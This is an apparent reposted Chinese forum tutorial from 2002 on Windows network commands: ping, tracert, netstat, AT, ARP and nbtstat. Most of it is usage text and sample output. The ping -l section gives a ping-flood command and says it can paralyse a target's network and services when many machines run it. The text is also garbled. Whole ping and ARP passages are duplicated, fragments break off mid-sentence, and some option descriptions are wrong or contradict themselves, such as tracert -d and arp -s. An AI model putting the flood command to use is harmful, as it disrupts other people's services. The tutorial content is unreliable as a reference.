网络基本命令[转载]

标题: 网络基本命令
日期: 2002-11-09
内容:

ping
一.基础知识:
ping-TCP/IP协议中最有用的命令之一
它给另一个系统发送一系列的数据包,该系统本身又发回一个响应,这条实用程序对查找远程主机很有用,它返回的结果表示是否能到达主机,宿主机发送一个返回数据包需要多长时间。
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS] [-r count] [-s count] [[-j host-list] [-k host-list]] [-w timeout] destination-list

Options:
-t Ping the specifed host until interrupted.(除非人为中止,否则一直ping下去)
-a Resolve addresses to hostnames.(解析计算机NetBios名)
-n count Number of echo requests to send.(发送 count 指定的 ECHO 数据包数,默认值为 4)
-l size Send buffer size.(发送指定的数据量的 ECHO 数据包。默认为 32 字节;最大值是 65,527)
-f Set Don't Fragment flag in packet.(数据包中发送“不要分段”标志)
-i TTL Time To Live.(在对方的系统里停留的时间)
-v TOS Type Of Service.(服务类型)
-r count Record route for count hops.(在“记录路由”字段中记录路由跳点所经过的路径。count 可以指定最少 1 台,最多 9 台计算机)
-s count Timestamp for count hops.(记录记录路由跳点的缓存时间)
-j host-list Loose source route along host-list.(利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔(路由稀疏源)IP 允许的最大数量为 9)
-k host-list Strict source route along host-list.(利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔(路由严格源)IP 允许的最大数量为 9)
-w timeout Timeout in milliseconds to wait for each reply.(指定超时间隔,单位为毫秒)
destination-list (指定要 ping 的远程计算机)

其实这个命令主要是用来看对方应答的速度,如果怎么ping 得到的结果都是Request time out。那恐怕你根本就不用你去找这台主机了,它不在你的射程之内。

二.使用实例

-t: 不停的ping…………,直到你按下Ctrl-C。此功能没有什么特别的技巧,不过可以配合其他参数使用,无实例。

-a:
C:\>ping -a 218.19.49.213
Pinging SJJ [218.19.49.213] with 32 bytes of data: 【正在发送 32 字节的包到 :218.19.49.213】
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116 【正确抵达/大小32字节/消耗时间 62ms/停留时间]
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Ping statistics for 218.19.49.213: 【资料统计】
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
从上面就可以知道IP为218.19.49.213的计算机NetBios名为SJJ。

-n
在默认情况下,一般都只发送四个数据包,通过这个命令可以自己定义发送的个数,对衡量网络速度很有帮助,比如我想测试发送50个数据包的返回的平均时间为多少,最快时间为多少,最慢时间为多少就可以通过以下获知:
C:\>ping -n 50 218.19.49.213

Pinging 218.19.49.213 with 32 bytes of data:

Reply from 218.19.49.213: bytes=32 time=71ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
Reply from 218.19.49.213: bytes=32 time=61ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=61ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=61ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=61ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116

Ping statistics for 218.19.49.213:
Packets: Sent = 50, Received = 50, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 50ms, Maximum = 71ms, Average = 57ms

从以上我就可以知道在给218.19.49.213发送50个数据包的过程当中,返回了50个,这50个数据包当中返回速度最快为50ms,最慢为71ms,平均速度为57ms。

-l
在默认的情况下windows的ping发送的数据包大小为32byte,我们也可以自己定义它的大小,但有一个大小的限制,就是最大只能发送65500byte,也许有人会问为什么要限制到65500byt,因为Windows系列的系统都有一个安全漏洞(也许还包括其他系统)就是当向对方一次发送的数据包大于或等于65532时,对方就很有可能挡机,所以微软公司为了解决这一安全漏洞于是限制了ping的数据包大小。虽然微软公司已经做了此限制,但这个参数配合其他参数以后危害依然非常强大,比如我们就可以通过配合-t参数来实现一个带有攻击性的命令(网络风暴,不可轻易使用)。
c:/)ping -l aaaaaa -t xxx.xxx.xxx.xxx
这样它就会不停的向xxx.xxx.xxx.xxx计算机发送大小为aaaaaabyte的数据包,如果你只有一台计算机也许没有什么效果,但如果有很多计算机那么就可以使对方完全瘫痪,网络严重堵塞,HTTP和FTP服务完全停止,由此可见威力非同小可。

-f
在一般你所发送的数据包都会通过路由分段再发送给对方,加上此参数以后路由就不会再分段处理。
-i
用于帮助你检查网络运转情况的。

-r
在一般情况下你发送的数据包是通过一个个路由才到达对方的,但到底是经过了哪些路由呢?通过此参数就可以设定你想探测经过的路由的个数,不过限制在了9个,也就是说你只能跟踪到9个路由,如果想探测更多,可以通过其他命令实现,我将在以后的文章中给大家讲解。以下为示例:


C:\>ping -n 1 -r 9 218.19.49.213(发送一个数据包,最多记录9个路由)

Pinging 218.19.49.213 with 32 bytes of data:

Reply from 218.19.49.213: bytes=32 time=80ms TTL=116
Route: 61.187.70.42->
61.187.134.253 ->
61.187.255.82 ->
61.187.255.69 ->
202.97.40.102 ->
61.140.0.1 ->
61.140.1.9 ->
61.144.0.53 ->
61.144.0.65

Ping statistics for 218.19.49.213:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 80ms, Maximum = 80ms, Average = 80ms
从上面我就可以知道从我的计算机到218.19.49.213一共通过了这几个路由。

-s
此参数和-r差不多,只是这个参数不记录数据包返回所经过的路由,最多也只记录4个。

-j
利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔(路由稀疏源)IP 允许的最大数量为 9。

-k
利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔(路由严格源)IP 允许的最大数量为 9。

-w
此参数没有什么其他技巧。

ping命令的其他技巧:
1.在一般情况下还可以通过ping对方让对方返回给你的TTL值大小,粗略的判断目标主机的系统类型是Windows系列还是UNIX/Linux系列,一般情况下Windows系列的系统返回的TTL值在100-130之间,而UNIX/Linux系列的系统返回的TTL值在240-255之间,当然TTL的值在对方的主机里是可以修改的,Windows系列的系统可以通过修改注册表以下键值实现:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"DefaultTTL"=dword:000000ff
255---FF
128---80
64----40
32----20
2.通过Ping检测网络故障的典型次序

正常情况下,当你使用Ping命令来查找问题所在或检验网络运行情况时,你需要使用许多Ping命令,如果所有都运行正确,你就可以相信基本的连通性和配置参数没有问题;如果某些Ping命令出现运行故障,它也可以指明到何处去查找问题。下面就给出一个典型的检测次序及对应的可能故障:

ping 127.0.0.1——这个Ping命令被送到本地计算机的IP软件,该命令永不退出该计算机。如果没有做到这一点,就表示TCP/IP的安装或运行存在某些最基本的问题。

ping 本机IP——这个命令被送到你计算机所配置的IP地址,你的计算机始终都应该对该Ping命令作出应答,如果没有,则表示本地配置或安装存在问题。出现此问题时,局域网用户请断开网络电缆,然后重新发送该命令。如果网线断开后本命令正确,则表示另一台计算机可能配置了相同的IP地址。

ping 局域网内其他IP——这个命令应该离开你的计算机,经过网卡及网络电缆到达其他计算机,再返回。收到回送应答表明本地网络中的网卡和载体运行正确。但如果收到0个回送应答,那么表示子网掩码(进行子网分割时,将IP地址的网络部分与主机部分分开的代码)不正确或网卡配置错误或电缆系统有问题。

ping 网关IP——这个命令如果应答正确,表示局域网中的网关路由器正在运行并能够作出应答。

ping 远程IP——如果收到4个应答,表示成功的使用了缺省网关。对于拨号上网用户则表示能够成功的访问Internet(但不排除ISP的DNS会有问题)。

ping localhost——localhost是个操作系统的网络保留名,它是127.0.0.1的别名,每太计算机都应该能够将该名字转换成该地址。如果没有做到这一带内,则表示主机文件(/Windows/host)中存在问题。

ping http://www.yahoo.com/——对这个域名执行Ping命令,你的计算机必须先将域名转换成IP地址,通常是通过DNS服务器。如果这里出现故障,则表示DNS服务器的IP地址配置不正确或DNS服务器有故障。顺便说一句:你也可以利用该命令实现域名对IP地址的转换功能。

如果上面所列出的所有Ping命令都能正常运行,那么你对你的计算机进行本地和远程通信的功能基本上就可以放心了。但是,这些命令的成功并不表示你所有的网络配置都没有问题,例如,某些子网掩码错误就可能无法用这些方法检测到。



61.187.255.82 ->
61.187.255.69 ->
202.97.40.102 ->
61.140.0.1 ->
61.140.1.9 ->
61.144.0.53 ->
61.144.0.65

Ping statistics for 218.19.49.213:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 80ms, Maximum = 80ms, Average = 80ms
从上面我就可以知道从我的计算机到218.19.49.213一共通过了这几个路由。

-s
此参数和-r差不多,只是这个参数不记录数据包返回所经过的路由,最多也只记录4个。

-j
利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔(路由稀疏源)IP 允许的最大数量为 9。

-k
利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔(路由严格源)IP 允许的最大数量为 9。

-w
此参数没有什么其他技巧。

ping命令的其他技巧:
1.在一般情况下还可以通过ping对方让对方返回给你的TTL值大小,粗略的判断目标主机的系统类型是Windows系列还是UNIX/Linux系列,一般情况下Windows系列的系统返回的TTL值在100-130之间,而UNIX/Linux系列的系统返回的TTL值在240-255之间,当然TTL的值在对方的主机里是可以修改的,Windows系列的系统可以通过修改注册表以下键值实现:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"DefaultTTL"=dword:000000ff
255---FF
128---80
64----40
32----20
2.通过Ping检测网络故障的典型次序

正常情况下,当你使用Ping命令来查找问题所在或检验网络运行情况时,你需要使用许多Ping命令,如果所有都运行正确,你就可以相信基本的连通性和配置参数没有问题;如果某些Ping命令出现运行故障,它也可以指明到何处去查找问题。下面就给出一个典型的检测次序及对应的可能故障:

ping 127.0.0.1——这个Ping命令被送到本地计算机的IP软件,该命令永不退出该计算机。如果没有做到这一点,就表示TCP/IP的安装或运行存在某些最基本的问题。

ping 本机IP——这个命令被送到你计算机所配置的IP地址,你的计算机始终都应该对该Ping命令作出应答,如果没有,则表示本地配置或安装存在问题。出现此问题时,局域网用户请断开网络电缆,然后重新发送该命令。如果网线断开后本命令正确,则表示另一台计算机可能配置了相同的IP地址。

ping 局域网内其他IP——这个命令应该离开你的计算机,经过网卡及网络电缆到达其他计算机,再返回。收到回送应答表明本地网络中的网卡和载体运行正确。但如果收到0个回送应答,那么表示子网掩码(进行子网分割时,将IP地址的网络部分与主机部分分开的代码)不正确或网卡配置错误或电缆系统有问题。

ping 网关IP——这个命令如果应答正确,表示局域网中的网关路由器正在运行并能够作出应答。

ping 远程IP——如果收到4个应答,表示成功的使用了缺省网关。对于拨号上网用户则表示能够成功的访问Internet(但不排除ISP的DNS会有问题)。

ping localhost——localhost是个操作系统的网络保留名,它是127.0.0.1的别名,每太计算机都应该能够将该名字转换成该地址。如果没有做到这一带内,则表示主机文件(/Windows/host)中存在问题。

ping http://www.yahoo.com/——对这个域名执行Ping命令,你的计算机必须先将域名转换成IP地址,通常是通过DNS服务器。如果这里出现故障,则表示DNS服务器的IP地址配置不正确或DNS服务器有故障。顺便说一句:你也可以利用该命令实现域名对IP地址的转换功能。

如果上面所列出的所有Ping命令都能正常运行,那么你对你的计算机进行本地和远程通信的功能基本上就可以放心了。但是,这些命令的成功并不表示你所有的网络配置都没有问题,例如,某些子网掩码错误就可能无法用这些


---------------------------------------------------------

作者: 老虎
日期: 2002-11-09
内容:
Tracert

一、基础知识
tracert:是验证通往远程主机路径的实用程序
Usage: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name

Options:
-d 使用参数-d,可以指定程序在跟踪主机的路径信息时,同时也解析目标主机的域名。
-h maximum_hops Maximum number of hops to search for target.(指定搜索到目标地址的最大跳跃数 )
-j host-list Loose source route along host-list.(按照主机列表中的地址释放源路由 )
-w timeout Wait timeout milliseconds for each reply.(指定超时时间间隔,程序默认的时间单位是ms)
主要功能:判定数据包到达目的主机所经过的路径、显示数据包经过的中继节点清单和到达时间。

二. 实例
1.如果我们想了解自己计算机与目标计算机http://www.adsl4u.net/之间详细的传输路径信息。在dos提示符下键入:

C:/>tracert http://www.adsl4u.net/

Tracing route to http://www.adsl4u.net/ [211.154.211.3]
over a maximum of 30 hops:

1 50 ms 40 ms 50 ms 61.187.71.219
2 40 ms 40 ms 50 ms 61.187.70.41
3 40 ms 40 ms 50 ms 61.187.134.254
4 40 ms 40 ms 50 ms 61.187.255.81
5 40 ms 41 ms 50 ms 61.187.255.70
6 50 ms 50 ms 50 ms p-4-0-r1-c-gdgz-1.cn.net [202.97.40.101]
7 80 ms 80 ms 80 ms 202.97.38.162
8 80 ms 80 ms 81 ms 202.96.12.38
9 80 ms 80 ms 80 ms 202.106.192.158
10 81 ms 80 ms 80 ms 202.96.13.134
11 81 ms 80 ms 80 ms 211.154.209.26
12 80 ms 80 ms 80 ms 211.154.211.3

Trace complete.

从上面进程我们可以从知道执行结果返回数据包到达目的主机前所经历的中继站清单,并显示到达每个中继站的时间。该功能同ping命令类似,但它所看到的信息要比ping命令详细得多,它把你送出的到某一站点的请求包,所走的全部路由都告诉你,并且通过该路由的ip是多少,通过该ip的时延是多少?通过这些时间,我们可以很方便地查出用户主机与目标网站之间的线路到底是在什么地方出了故障等情况。

如果我们在Tracert命令后面加上一些参数,还可以检测到其他更详细的信息,(在此不作详细实例),eg:使用参数-d,可以指定程序在跟踪主机的路径信息时,同时也解析目标主机的域名


----------------------------------------------------------

作者: 老虎
日期: 2002-11-09
内容:
Netstat
一.基础知识
netstat:观察网络连接状态的实用工具
Netstat网络命令可以显示当前正在活动的网络连接的详细信息,例如可以显示以太网的统计信息、显示所有协议的使用状态,这些协议包括TCP协议、UDP协议以及IP协议等、路由表和网络接口信息,可以让用户得知目前总共有哪些网络连接正在运行。网上可以看到很多如X-netstat之类的工具,无非其界面为win界面,比较直观些,其功能与此命令差不多去。
usage:Displays protocol statistics and current TCP/IP network connections..(显示协议与当前网络连接)

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a Displays all connections and listening ports.(显示所有连接和侦听端口)
-e Displays Ethernet statistics. This may be combined with the -s option.(显示以太网统计信息,可以与-s连用)
-n Displays addresses and port numbers in numerical form.(在数字表里显示地址和端口号)
-p proto Shows connections for the protocol specified by proto; proto may be TCP or UDP. If used with the -s option to display per-protocol statistics, proto may be TCP, UDP, or IP.(显示由 protocol 指定的协议的连接;protocol 可以是 tcp 或 udp。如果与 -s 选项一同使用显示每个协议的统计,protocol 可以是 tcp、udp、icmp 或 ip)
-r Displays the routing table.(显示路由表信息)
-s Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the -p option may be used to specify a subset of the default. (显示每个协议的统计。默认情况下,显示 TCP、UDP、ICMP 和 IP 的统计。-p 选项可以用来指定默认的子集)
interval Redisplays selected statistics, pausing interval seconds between each display. Press CTRL+C to stop redisplaying statistics. If omitted, netstat will print the current configuration information once.(重新显示所选的统计,在每次显示之间暂停 interval 秒。按 CTRL+C 停止重新显示统计。如果省略该参数,netstat 将打印一次当前的配置信息)

二.实例
1.查看当前网络连接状况
C:/>netstat /a

Active Connections
(端口类型)(本地地址) (外部地址) (状态)
Proto Local Address Foreign Address State
TCP adsl1688:telnet adsl1688:0 LISTENING 【端口类型 TCP 端口 Telnet 监听状态】
TCP adsl1688:epmap adsl1688:0 LISTENING
TCP adsl1688:microsoft-ds adsl1688:0 LISTENING
TCP adsl1688:1025 adsl1688:0 LISTENING
TCP adsl1688:1027 adsl1688:0 LISTENING 【端口类型 TCP 端口 1027 监听状态】

TCP adsl1688:1131 adsl1688:0 LISTENING
…………………………………………

UDP adsl1688:epmap *:*
UDP adsl1688:microsoft-ds *:*
UDP adsl1688:1026 *:* 【端口类型 UDP 端口 1026】
…………………………………………
用此参数可以清楚显示出你的计算机当前所开放的所有端口,其中包括TCP端口和UDP端口。我们可以经常的使用此参数,以此来查看计算机的系统服务是否正常,是否被“黑客”留下后门,木马等。我觉得我们应该有这么一个习惯,在刚刚装了系统配置好服务器以后我就会运行一下netstat -a看看系统开放了什么端口,并记录下来,以便以后作为参考使用,当发现有不明的端口时就可以及时的做出对策。由于这个参数同时还会显示出当前计算机有什么人的IP正连接着你的服务器,所以也是一种实时入侵检测工具,如发现有个IP连接着不正常的端口,你也可以及时做出有效对策。

C:/> Netstat -n -a

Active Connections 【活动的连接】

TCP 192.168.0.1:139 0.0.0.0:0 LISTENING
……
TCP 218.76.6.122:139 0.0.0.0:0 LISTENING
TCP 218.76.6.122:3038 61.186.175.113:2887 ESTABLISHED 【现在就可以很清楚的看见IP地址和端口名了】
UDP 0.0.0.0:135 *:*
…………………………………… .
2.查看以太网统计信息
C:/>netstat -e -a
Interface Statistics(通信数据统计)

Received【收到的】 Sent【发送的】

Bytes 4054478 717225
Unicast packets 7804 6158
Non-unicast packets 283 286
Discards 0 0
Errors 0 0
Unknown protocols【未知协议】 1564

3.查看路由信息

C:/>netstat -r

Route Table【路由表】
===========================================================================
Interface List【接口列表】
……………………………………
===========================================================================
Active Routes:【活动路由】
Network Destination【主机】 Netmask【子网掩码】 Gateway【网关】 Interface【接口】 Metric【跳数】
(关于Metric来源于几何的距量,我们用它来定义两router之间的距离(或称为Cost),计算计算公式为 10的8次方 / 速度(bps),也就是说,带宽越大的线路線路其Metric越小,可视为距离越近。谢谢坛主NeeKol的教导)

………………………………………………
Default Gateway:【缺省网关】 218.76.6.122
===========================================================================
Persistent Routes:
None
LISTENING 【端口类型 TCP 端口 1027 监听状态】

TCP adsl1688:1131 a

----------------------------------------------------------

作者: 老虎
日期: 2002-11-09
内容:
AT

前面提及了几个网络检测分析工具,IP探测工具Ping、网络统计工具NetStat、跟踪路由工具Tracert,提一个较为有趣的网络命令吧。
谈到这里不得不提一下ping plotter这个路由跟踪软件了(呵呵,走题了),它几乎囊括了上面三个网络命令的所有功能,并且提供了数据和图形两种表达方式,使得其检测分析结果更加直观和易于理解。具体ping plotter的下载和使用大家可以先自己学习一下。
轻松一点,接着来吧。其实下面这个网络命令最理想的是和net命令集中的net start配合使用比较好,就先提提吧。
usage:
AT 命令安排在特定日期和时间运行命令和程序。要使用 AT 命令,计划服务必须已在运行中。

AT [//computername] [ [id] [/DELETE] | /DELETE [/YES]
AT [//computername] time [/INTERACTIVE] [ /EVERY:date[,...] | /NEXT:date[,...] "command"

//computername 指定远程计算机。 如果省略这个参数,会计划在本地计算机上运行命令。
id 指定给已计划命令的识别号。
/delete 删除某个已计划的命令。如果省略 id,计算机上所有已计划的命令都会被删除。
/yes 不需要进一步确认时,跟删除所有作业的命令一起使用。
time 指定运行命令的时间。
/interactive 允许作业在运行时,与当时登录的用户桌面进行交互。
/every:date[,...] 每个月或每个星期在指定的日期运行命令。如果省略日期,则默认为在每月的本日运行。
/next:date[,...] 指定在下一个指定日期(如,下周四)运行命令。如果省略日期,则默认为在每月的本日运行。
"command" 准备运行的 Windows NT 命令或批处理程序。

二.实例
1.建立新任务(先土一点吧,net start以后…………)
C:/> AT 23:00 Start C:/勇气.mp3
新加了一项作业,其作业 ID = 1 【现在我们新建立了一个任务 在23.00 系统将自动播放“勇气”这首歌曲】

2.查看任务(schedule)

C:/> AT 【查看已经指定的任务】

状态 ID 日期 时间 命令行
-------------------------------------------------
1 今天 下午 23:00 Start C:/勇气.mp3

3.删除此命令
C:/> AT 1 /Delete 【删除1号任务】
C:/>at 【此时查看,空】
清单是空的。

AT的命令只能在2000下用


Edited by - 老虎 重新编辑於 2002-11-09 18:03:24

----------------------------------------------------------

作者: 老虎
日期: 2002-11-09
内容:
ARP

一、基础知识
ARP是一个重要的TCP/IP协议,并且用于确定对应IP地址的网卡物理地址。arp命令的使用,能够使你查看本地计算机或另一台计算机的ARP高速缓存中的当前内容。此外,使用arp命令,也可以用人工方式输入静态的网卡物理/IP地址,你可能会使用这种方式为缺省网关和本地服务器等常用主机进行这项操作,有助于减少网络上的信息量。
按照缺省设置,ARP高速缓存中的项目是动态的,每当发送一个指定地点的数据报且高速缓存中不存在当前项目时,ARP便会自动添加该项目。一旦高速缓存的项目被输入,它们就已经开始走向失效状态。因此,如果ARP高速缓存中项目很少或根本没有时,请不要奇怪,通过另一台计算机或路由器的ping命令即可添加。所以,需要通过arp命令查看高速缓存中的内容时,请最好先ping 此台计算机(不能是本机发送ping命令)。
usage:
Displays and modifies the IP-to-Physical address translation tables used by address resolution protocol (ARP).(显示和修改“地址解析协议”(ARP) 所使用的到以太网的 IP 或物理地址翻译表)
ARP -s inet_addr eth_addr [if_addr]
ARP -d inet_addr [if_addr]
ARP -a [inet_addr] [-N if_addr]

-a Displays current ARP entries by interrogating the current protocol data. If inet_addr is specified, the IP and Physical addresses for only the specified computer are displayed. If more than one network interface uses ARP, entries for each ARP table are displayed.(通过询问 TCP/IP 显示当前 ARP 项。如果指定了 inet_addr,则只显示指定计算机的 IP 和物理地址)
-g Same as -a.(与 -a 相同)
inet_addr Specifies an internet address.(以加点的十进制标记指定 IP 地址)
-N if_addr Displays the ARP entries for the network interface specified by if_addr.(显示由 if_addr 指定的网络界面 ARP 项)
-d Deletes the host specified by inet_addr. inet_addr may be wildcarded with * to delete all hosts.(删除由 inet_addr 指定的项)
-s Adds the host and associates the Internet address inet_addr with the Physical address eth_addr. The Physical address is given as 6 hexadecimal bytes separated by hyphens. The entry is permanent.(在 ARP 缓存中添加项,将 IP 地址 inet_addr 和物理地址 ether_addr 关联。物理地址由以连字符分隔的 6 个十六进制字节给定。使用带点的十进制标记指定 IP 地址。项是永久性的,即在超时到期后项自动从缓存删除)
eth_addr Specifies a physical address.(指定物理地址)
if_addr If present, this specifies the Internet address of the interface whose address translation table should be modified.If not present, the first applicable interface will be used..(指定需要修改其地址转换表接口的 IP 地址(如果有的话)。如果不存在,将使用第一个可适用的接口)

二、实例
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:/>ping 192.168.0.10

Pinging 192.168.0.10 with 32 bytes of data:

Reply from 192.168.0.10: bytes=32 time<10ms TTL=128
Reply from 192.168.0.10: bytes=32 time<10ms TTL=128
Reply from 192.168.0.10: bytes=32 time<10ms TTL=128
Reply from 192.168.0.10: bytes=32 time<10ms TTL=128

Ping statistics for 192.168.0.10:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms

C:/>arp -a【用于查看高速缓存中的所有项目】

Interface: 192.168.0.65 on Interface 0x2
Internet Address Physical Address Type
192.168.0.10 00-00-00-11-22-33 dynamic
192.168.0.68 00-80-c8-ad-d2-cd dynamic
192.168.0.255 12-50-ba-00-22-98 dynamic

C:/>arp -s 192.168.0.10 00-00-00-11-22-33【向ARP高速缓存中人工输入一个静态项目】

Interface: 192.168.0.65 on Interface 0x02
Internet Address Physical Address Type
192.168.0.10 00-00-00-11-22-33 static【静态的】
192.168.0.68 00-80-c8-ad-d2-cd dynamic【动态的】
192.168.0.255 12-50-ba-00-22-98 dynamic

C:/>arp -d 192.168.0.10

C:/>arp -a
Interface: 192.168.0.65 on Interface 0x02
Internet Address Physical Address Type
192.168.0.68 00-80-c8-ad-d2-cd dynamic
192.168.0.255 12-50-ba-00-22-98 dynamic

具体此命令使用http://www.pconline.com.cn/pcedu/soft/lan/jywgl/10207/79487.html


_addr. The Physical address is given as 6 hexadecimal bytes separated by hyphens. The entry is permanent.(在 ARP 缓存中添加项,将 IP 地址 inet_addr 和物理地址 ether_addr 关联。物理地址由以连字符分隔的 6 个十六进制字节给定。使用带点的十进制标记指定 IP 地址。项是永久性的,即在超时到期后项自动从缓存删除)
eth_addr Specifies a physical address.(指定物理地址)
if_addr If present, this specifies the Internet address of the interface whose address translation table should be modified.If not present, the first applicable interface will be used..(指定需要修改其地址转换表接口的 IP 地址(如果有的话)。如果不存在,将使用第一个可适用的接口)

二、实例
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:/>ping 192.168.0.10

----------------------------------------------------------

作者: 老虎
日期: 2002-11-09
内容:
NBTSTAT

一、基础知识
netstat和nbtstat可以说都是Windows下的网络检测工具(NETSTAT命令:用于查询与某类信息有关的子系统;NBTSTAT命令:用于查看当前基于NETBIOS的TCP/IP连接状态),都需要在安装了TCP/IP协议以后才可以使用的。

Usage:
Displays protocol statistics and current TCP/IP connections using NBT (NetBIOS over TCP/IP).(诊断命令使用 NBT(TCP/IP 上的 NetBIOS)显示协议统计和当前 TCP/IP 连接)

NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n] [-r] [-R] [-RR] [-s] [-S] [interval] ]

-a (adapter status) Lists the remote machine's name table given its name(使用远程计算机的名称列出其名称表)
-A (Adapter status) Lists the remote machine's name table given its IP address.(使用远程计算机的 IP 地址并列出名称表(其实用处不大,-a已经包括了此功能))
-c (cache) Lists NBT's cache of remote [machine] names and their IP
addresses(给定每个名称的 IP 地址并列出 NetBIOS 名称缓存的内容)
-n (names) Lists local NetBIOS names.(列出本地 NetBIOS 名称)
-r (resolved) Lists names resolved by broadcast and via WINS(要通过广播或 WINS 来解析和注册的名称数)
-R (Reload) Purges and reloads the remote cache name table(清除 NetBIOS 名称缓存中的所有名称后,重新装入 Lmhosts 文件(这个参数就是清除netstat -c所能看见的Cache里的IP缓存的))
-S (Sessions) Lists sessions table with the destination IP addresses(显示客户端和服务器会话,只通过 IP 地址列出远程计算机)
-s (sessions) Lists sessions table converting destination IP addresses to computer NETBIOS names.(显示客户端和服务器会话。尝试将远程计算机 IP 地址转换成使用主机文件的名称(此参数和-S差不多,只是这个会把对方的NetBIOS名给解析出来))
-RR (ReleaseRefresh) Sends Name Release packets to WINs and then, starts Refresh(释放在 WINS 服务器上注册的 NetBIOS 名称,然后刷新它们的注册)

RemoteName Remote host machine name.
IP address Dotted decimal representation of the IP address.
interval Redisplays selected statistics, pausing interval seconds between each display. Press Ctrl+C to stop redisplaying statistics.(重新显示选中的统计,在每个显示之间暂停 interval 秒。按 CTRL+C 停止重新显示统计信息。如果省略该参数,nbtstat 打印一次当前的配置信息)

二、实例

1.查看连接状态
C:/>nbtstat -a adsl1688

本地连接 3:
Node IpAddress: [218.76.4.35] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
ADSL1688 <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
WORKGROUP <1E> GROUP Registered
ADSL1688 <20> UNIQUE Registered
…………………………

MAC Address = 44-45-53-54-77-77

本地连接:
Node IpAddress: [192.168.0.65] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
ADSL1688 <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
WORKGROUP <1E> GROUP Registered
ADSL1688 <20> UNIQUE Registered
WORKGROUP <1D> UNIQUE Registered
LIUQUch <03> GROUP Registered
ADSL1688 <03> UNIQUE Registered

MAC Address = 00-07-53-00-4E-B7
从上面就可以知道我的计算机当前计算机的NetBios名为adsl1688属于workgroup域内,当前有liuquch登陆的本计算机,呵呵,全都出来了。此参数也可nbtstat -a 192.168.0.65,显示结果和上面的相同。
